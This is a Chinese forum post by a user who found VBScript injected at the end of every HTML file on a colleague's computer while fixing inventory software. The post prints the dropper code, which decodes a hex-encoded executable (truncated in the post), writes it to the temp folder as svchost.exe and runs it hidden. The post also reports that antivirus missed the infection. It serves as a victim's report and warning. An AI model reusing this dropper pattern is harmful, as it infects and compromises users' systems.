事情是这样子的
远程帮同事搞进销存软件 ,发现软件打开不正常了
如图
"在此页上的ActiveX控件和本页上的其它部分的交互可能不安全“
我选择继续,是
如下图
“当前页面脚本发生错误。%1不是有效的win32应用程序。”
这里我要说一下的,IE浏览器我都是设置过的,正常情况下进入这个页面是不会有这两个提示的
我觉得哪里有猫腻,我按提示路径找到那个html文件,发现如下
在html文件尾部被添加了如下代码
[Visual Basic] 纯文本查看 复制代码
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000...........后面还有很多"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->
用文本记事本打开一串字符,打开会乱码
这个代码目的是什么吗?只感染一个软件 ?然后检查所有的html文件,
发现所有的html 网页文件全部被修改添加了 ,如图
全盘的文件无一幸免,我不懂编程,但知道这是VBS代码,应该有一段时间了的,本地安装了3X0全家桶的,但好像没有阻止
现在正在挂了一个Win 10 ,用Windows Defender 安全中心扫描中
微软自家产品还是可以的
论坛上也有类似的案例,前面我搜索了一下2015年时候就有类似案例的VBS木马(应该算木马)
我这边发帖子,分享整个问题发现的过程
,从软件打开异常,发现html网页有问题,第一次发帖子,来支持论坛
PS: 感觉国产杀毒软件(3X0,等不怎么靠谱)